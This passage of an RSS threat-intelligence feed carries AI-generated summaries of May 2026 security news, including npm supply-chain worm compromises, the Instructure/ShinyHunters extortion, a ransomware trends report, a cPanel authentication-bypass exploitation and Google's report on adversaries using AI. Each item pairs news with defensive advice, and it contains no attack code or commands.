&lt;p&gt;Incident, High Severity, Cyber Extortion, Data Extortion&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Bleeping Computer | &lt;a href=&quot;https://www.bleepingcomputer.com/news/security/instructure-reaches-agreement-with-shinyhunters-to-stop-data-leak/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 12 May 2026 09:23:56 GMT</pubDate>
      <dc:creator>Sergiu Gatlan</dc:creator>
      <source url="https://www.bleepingcomputer.com/news/security/instructure-reaches-agreement-with-shinyhunters-to-stop-data-leak/">Bleeping Computer</source>
      <category>Incident</category>
      <category>Cyber Extortion</category>
      <category>Data Extortion</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Mini Shai-Hulud Worm Compromises TanStack, Mistral AI, Guardrails AI &amp; More Packages</title>
      <link>https://brewedintel.io/articles/6ce18faa-409e-440f-8058-b165a8d54334</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/6ce18faa-409e-440f-8058-b165a8d54334</guid>
      <description>This article details a supply chain attack by the threat actor TeamPCP, who compromised multiple npm and PyPI packages from TanStack, UiPath, Mistral AI, OpenSearch, and Guardrails AI using a worm named Mini Shai-Hulud. The malicious code, an obfuscated JavaScript file called router_init.js, profiles execution environments, posing a significant risk of data theft or further compromise. Organizations using these packages must immediately assess their exposure and remove any compromised versions to prevent known or potential threats.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;This article details a supply chain attack by the threat actor TeamPCP, who compromised multiple npm and PyPI packages from TanStack, UiPath, Mistral AI, OpenSearch, and Guardrails AI using a worm named Mini Shai-Hulud. The malicious code, an obfuscated JavaScript file called router_init.js, profiles execution environments, posing a significant risk of data theft or further compromise. Organizations using these packages must immediately assess their exposure and remove any compromised versions to prevent known or potential threats.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Supply chain attacks like this can lead to widespread compromise across multiple organizations, giving attackers a foothold in trusted software ecosystems.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Immediately audit and update any affected packages, verify integrity against official signatures, and implement runtime monitoring for suspicious script behavior.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, Critical Severity, Malware, Supply Chain Attack&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/mini-shai-hulud-worm-compromises.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 12 May 2026 08:50:00 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/mini-shai-hulud-worm-compromises.html">The Hacker News</source>
      <category>Adversary</category>
      <category>Malware</category>
      <category>Supply Chain Attack</category>
      <category>Critical Severity</category>
    </item>
    <item>
      <title>Instructure Reaches Ransom Agreement with ShinyHunters to Stop 3.65TB Canvas Leak</title>
      <link>https://brewedintel.io/articles/c4e34dda-437f-4c32-8b82-08ff05de835c</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/c4e34dda-437f-4c32-8b82-08ff05de835c</guid>
      <description>Instructure, the parent company of Canvas, confirmed it reached a ransom agreement with the cybercrime group ShinyHunters after they breached its network and threatened to leak 3.65 TB of stolen data from thousands of schools and universities. The attack highlights the growing threat of extortion-focused ransomware groups targeting educational institutions. The agreement may involve payment to prevent data disclosure, but the full impact on affected organizations remains unclear. This incident underscores the critical need for robust data protection, network segmentation, and incident response plans in the education sector.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Instructure, the parent company of Canvas, confirmed it reached a ransom agreement with the cybercrime group ShinyHunters after they breached its network and threatened to leak 3.65 TB of stolen data from thousands of schools and universities. The attack highlights the growing threat of extortion-focused ransomware groups targeting educational institutions. The agreement may involve payment to prevent data disclosure, but the full impact on affected organizations remains unclear. This incident underscores the critical need for robust data protection, network segmentation, and incident response plans in the education sector.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;The breach exposed sensitive data from thousands of educational institutions, demonstrating that threat actors specifically target the education sector due to its often limited security resources and high-value data.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Implement strong access controls and multi-factor authentication, regularly back up critical data, and conduct security awareness training to prevent initial compromises. Additionally, have an incident response plan that includes extortion negotiation guidelines.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Data Extortion, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/instructure-reaches-ransom-agreement.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 12 May 2026 07:37:00 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/instructure-reaches-ransom-agreement.html">The Hacker News</source>
      <category>Malware</category>
      <category>Data Extortion</category>
      <category>Ransomware</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>State of ransomware in 2026</title>
      <link>https://brewedintel.io/articles/15b7571d-becb-4e40-b801-ee08cc9b1678</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/15b7571d-becb-4e40-b801-ee08cc9b1678</guid>
      <description>Kaspersky&#x27;s 2026 ransomware report reveals ongoing evolution despite a decline in affected organizations. Key trends include increased use of EDR killers to bypass defenses, adoption of post-quantum cryptography (e.g., PE32 ransomware using ML-KEM/Kyber1024) making decryption nearly impossible, and a shift toward encryptionless extortion focused on data theft and public disclosure, as exemplified by ShinyHunters. The manufacturing sector alone suffered over $18 billion in losses in Q1-Q3 2025. These developments underscore that ransomware is transitioning from a business continuity issue to a data security and compliance challenge, reducing the effectiveness of backups alone and demanding enhanced defensive measures.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Kaspersky&amp;#x27;s 2026 ransomware report reveals ongoing evolution despite a decline in affected organizations. Key trends include increased use of EDR killers to bypass defenses, adoption of post-quantum cryptography (e.g., PE32 ransomware using ML-KEM/Kyber1024) making decryption nearly impossible, and a shift toward encryptionless extortion focused on data theft and public disclosure, as exemplified by ShinyHunters. The manufacturing sector alone suffered over $18 billion in losses in Q1-Q3 2025. These developments underscore that ransomware is transitioning from a business continuity issue to a data security and compliance challenge, reducing the effectiveness of backups alone and demanding enhanced defensive measures.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Ransomware operators are increasingly neutralizing endpoint defenses with EDR killers and shifting to data-theft extortion, bypassing traditional backup protections and exposing sensitive data.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Strengthen endpoint detection and response against defense evasion techniques, implement data loss prevention and access controls, and ensure comprehensive incident response plans address both encryption and data exposure scenarios.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Malware, High Severity, Extortion, Ransomware&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Kaspersky Securelist | &lt;a href=&quot;https://securelist.com/state-of-ransomware-in-2026/119761/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 12 May 2026 07:00:04 GMT</pubDate>
      <dc:creator>Fabio Assolini, Marc Rivero, Maher Yamout, daryagorodilova</dc:creator>
      <source url="https://securelist.com/state-of-ransomware-in-2026/119761/">Kaspersky Securelist</source>
      <category>Malware</category>
      <category>Extortion</category>
      <category>Ransomware</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>Mini Shai-Hulud Strikes Again: TanStack + more npm Packages Compromised</title>
      <link>https://brewedintel.io/articles/185e32bf-92e7-4a02-b6d1-334a6df1676e</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/185e32bf-92e7-4a02-b6d1-334a6df1676e</guid>
      <description>The article reports on a renewed supply chain campaign attributed to the threat actor Mini Shai-Hulud, which has compromised legitimate npm packages, notably including TanStack. By injecting malicious code into widely used developer tooling, the group aims to distribute malware or exfiltrate data to downstream developers and organizations. This type of dependency injection attack poses a high risk to software supply chains, potentially enabling widespread initial access, privilege escalation, and persistent backdoors across multiple environments. Immediate mitigation requires auditing npm dependencies for unauthorized commits, verifying package integrity through code signing and dependency pinning, and utilizing supply chain security platforms that detect anomalous package updates. Organizations must enforce strict CI/CD controls and monitor for unusual network egress from build systems to limit potential fallout.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;The article reports on a renewed supply chain campaign attributed to the threat actor Mini Shai-Hulud, which has compromised legitimate npm packages, notably including TanStack. By injecting malicious code into widely used developer tooling, the group aims to distribute malware or exfiltrate data to downstream developers and organizations. This type of dependency injection attack poses a high risk to software supply chains, potentially enabling widespread initial access, privilege escalation, and persistent backdoors across multiple environments. Immediate mitigation requires auditing npm dependencies for unauthorized commits, verifying package integrity through code signing and dependency pinning, and utilizing supply chain security platforms that detect anomalous package updates. Organizations must enforce strict CI/CD controls and monitor for unusual network egress from build systems to limit potential fallout.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Npm supply chain compromises directly expose development pipelines and downstream applications to malicious code, enabling widespread initial access and persistent backdoors across your software ecosystem.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Audit all npm dependencies for unauthorized updates, enforce dependency pinning and code signing, and deploy supply chain monitoring tools to detect anomalous package behavior during installation.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Adversary, High Severity, Malicious Dependency Injection, Supply Chain Attack&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Wiz Security Research | &lt;a href=&quot;https://www.wiz.io/blog/mini-shai-hulud-strikes-again-tanstack-more-npm-packages-compromised&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Tue, 12 May 2026 01:38:56 GMT</pubDate>
      <dc:creator>Benjamin Read</dc:creator>
      <source url="https://www.wiz.io/blog/mini-shai-hulud-strikes-again-tanstack-more-npm-packages-compromised">Wiz Security Research</source>
      <category>Adversary</category>
      <category>Malicious Dependency Injection</category>
      <category>Supply Chain Attack</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>TeamPCP Compromises Checkmarx Jenkins AST Plugin Weeks After KICS Supply Chain Attack</title>
      <link>https://brewedintel.io/articles/dab07641-7877-42ec-b91c-d516eeb0c2c0</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/dab07641-7877-42ec-b91c-d516eeb0c2c0</guid>
      <description>TeamPCP compromised the Checkmarx Jenkins AST plugin by publishing a modified version to the Jenkins Marketplace. This supply chain attack follows a similar incident with KICS. Users of the plugin risk unauthorized code execution and potential compromise of their Jenkins environments. Checkmarx has released a safe version (2.0.13-829.vc72453fa_1c16 from December 17, 2025) and urges users to ensure they are running that version or earlier. Immediate action is required to verify plugin integrity and prevent exploitation.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;TeamPCP compromised the Checkmarx Jenkins AST plugin by publishing a modified version to the Jenkins Marketplace. This supply chain attack follows a similar incident with KICS. Users of the plugin risk unauthorized code execution and potential compromise of their Jenkins environments. Checkmarx has released a safe version (2.0.13-829.vc72453fa_1c16 from December 17, 2025) and urges users to ensure they are running that version or earlier. Immediate action is required to verify plugin integrity and prevent exploitation.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This supply chain attack directly targets Jenkins environments, potentially allowing attackers to execute malicious code within your CI/CD pipeline, leading to data breaches or further compromise.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Verify your Checkmarx Jenkins AST plugin version and update to 2.0.13-829.vc72453fa_1c16 or earlier. Monitor for any suspicious activity and consider implementing integrity checks for all plugins.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Other, High Severity, Malicious Plugin, Supply Chain Compromise&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/teampcp-compromises-checkmarx-jenkins.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 11 May 2026 18:30:00 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/teampcp-compromises-checkmarx-jenkins.html">The Hacker News</source>
      <category>Other</category>
      <category>Malicious Plugin</category>
      <category>Supply Chain Compromise</category>
      <category>High Severity</category>
    </item>
    <item>
      <title>cPanel CVE-2026-41940 Under Active Exploitation to Deploy Filemanager Backdoor</title>
      <link>https://brewedintel.io/articles/37079942-34fc-468f-9ad5-023ec3745d1d</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/37079942-34fc-468f-9ad5-023ec3745d1d</guid>
      <description>A threat actor named Mr_Rot13 is actively exploiting CVE-2026-41940, a critical authentication bypass vulnerability in cPanel and WebHost Manager (WHM), to deploy a backdoor named Filemanager on compromised servers. This attack allows remote attackers to gain elevated control, posing a significant risk to web hosting environments. Organizations using affected versions should immediately apply patches and monitor for indicators of compromise. The exploitation underscores the importance of timely vulnerability management and proactive threat hunting.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;A threat actor named Mr_Rot13 is actively exploiting CVE-2026-41940, a critical authentication bypass vulnerability in cPanel and WebHost Manager (WHM), to deploy a backdoor named Filemanager on compromised servers. This attack allows remote attackers to gain elevated control, posing a significant risk to web hosting environments. Organizations using affected versions should immediately apply patches and monitor for indicators of compromise. The exploitation underscores the importance of timely vulnerability management and proactive threat hunting.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;This active exploitation of a critical cPanel vulnerability allows attackers to bypass authentication and deploy a persistent backdoor, potentially leading to full compromise of web hosting servers and data breaches.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Immediately patch cPanel/WHM to the latest version to mitigate CVE-2026-41940, and scan for unauthorized Filemanager files or unusual authentication logs. Restrict network access to management interfaces and enable multi-factor authentication.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Vulnerability, Critical Severity, Authentication Bypass, Backdoor&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: The Hacker News | &lt;a href=&quot;https://thehackernews.com/2026/05/cpanel-cve-2026-41940-under-active.html&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 11 May 2026 17:54:00 GMT</pubDate>
      <dc:creator>info@thehackernews.com (The Hacker News)</dc:creator>
      <source url="https://thehackernews.com/2026/05/cpanel-cve-2026-41940-under-active.html">The Hacker News</source>
      <category>Vulnerability</category>
      <category>Authentication Bypass</category>
      <category>Backdoor</category>
      <category>Critical Severity</category>
    </item>
    <item>
      <title>GTIG AI Threat Tracker: Adversaries Leverage AI for Vulnerability Exploitation, Augmented Operations, and Initial Access</title>
      <link>https://brewedintel.io/articles/6f362318-7b77-4de3-a2d3-a9e328430d82</link>
      <guid isPermaLink="true">https://brewedintel.io/articles/6f362318-7b77-4de3-a2d3-a9e328430d82</guid>
      <description>Google Threat Intelligence Group highlights a paradigm shift in cyber operations, where adversaries increasingly leverage generative AI to automate and scale attack lifecycles. State-sponsored and criminal groups are utilizing AI for advanced vulnerability discovery, zero-day exploit development, and AI-augmented defense evasion through polymorphic code and decoy logic. Notable malware families like PROMPTSPY and SANDCLOCK demonstrate autonomous orchestration and credential theft capabilities. Supply chain compromises targeting AI development ecosystems and open-source dependencies pose significant initial access risks. Defenders must prioritize monitoring for AI-augmented behavioral anomalies, enforce strict supply chain integrity controls, implement AI model abuse detection, and deploy advanced behavioral analytics to counter dynamic command generation and automated reconnaissance. Proactive threat hunting and robust LLM usage policies are critical to mitigating this evolving threat landscape.</description>
      <content:encoded>&lt;h2&gt;AI Summary&lt;/h2&gt;
&lt;p&gt;Google Threat Intelligence Group highlights a paradigm shift in cyber operations, where adversaries increasingly leverage generative AI to automate and scale attack lifecycles. State-sponsored and criminal groups are utilizing AI for advanced vulnerability discovery, zero-day exploit development, and AI-augmented defense evasion through polymorphic code and decoy logic. Notable malware families like PROMPTSPY and SANDCLOCK demonstrate autonomous orchestration and credential theft capabilities. Supply chain compromises targeting AI development ecosystems and open-source dependencies pose significant initial access risks. Defenders must prioritize monitoring for AI-augmented behavioral anomalies, enforce strict supply chain integrity controls, implement AI model abuse detection, and deploy advanced behavioral analytics to counter dynamic command generation and automated reconnaissance. Proactive threat hunting and robust LLM usage policies are critical to mitigating this evolving threat landscape.&lt;/p&gt;
&lt;h2&gt;Why do I care?&lt;/h2&gt;
&lt;p&gt;Adversaries are industrializing AI to automate exploit development, evade detection through polymorphic code, and compromise software supply chains, drastically lowering the barrier for sophisticated, high-volume attacks that traditional signatures cannot stop.&lt;/p&gt;
&lt;h2&gt;What can I do about it?&lt;/h2&gt;
&lt;p&gt;Enforce strict software supply chain verification, deploy behavioral monitoring for anomalous API usage and dynamic command generation, and implement automated code analysis tools to detect AI-generated obfuscation and malicious dependencies.&lt;/p&gt;
&lt;h2&gt;Classification&lt;/h2&gt;
&lt;p&gt;Vulnerability, High Severity, AI-Augmented Malware, Information Operations, Supply Chain Compromise&lt;/p&gt;
&lt;h2&gt;Source&lt;/h2&gt;
&lt;p&gt;Source feed: Mandiant Frontline Blog | &lt;a href=&quot;https://cloud.google.com/blog/topics/threat-intelligence/ai-vulnerability-exploitation-initial-access/&quot;&gt;Original source&lt;/a&gt;&lt;/p&gt;</content:encoded>
      <pubDate>Mon, 11 May 2026 14:00:00 GMT</pubDate>
      <dc:creator>Google Threat Intelligence Group</dc:creator>
      <source url="https://cloud.google.com/blog/topics/threat-intelligence/ai-vulnerability-exploitation-initial-access/">Mandiant Frontline Blog</source>
      <category>Vulnerability</category>
      <category>AI-Augmented Malware</category>
      <category>Information Operations</category>
      <category>Supply Chain Compromise</category>
      <category>Vulnerability Exploitation</category>
      <category>High Severity</category>
    </item>
  </channel>
</rss>
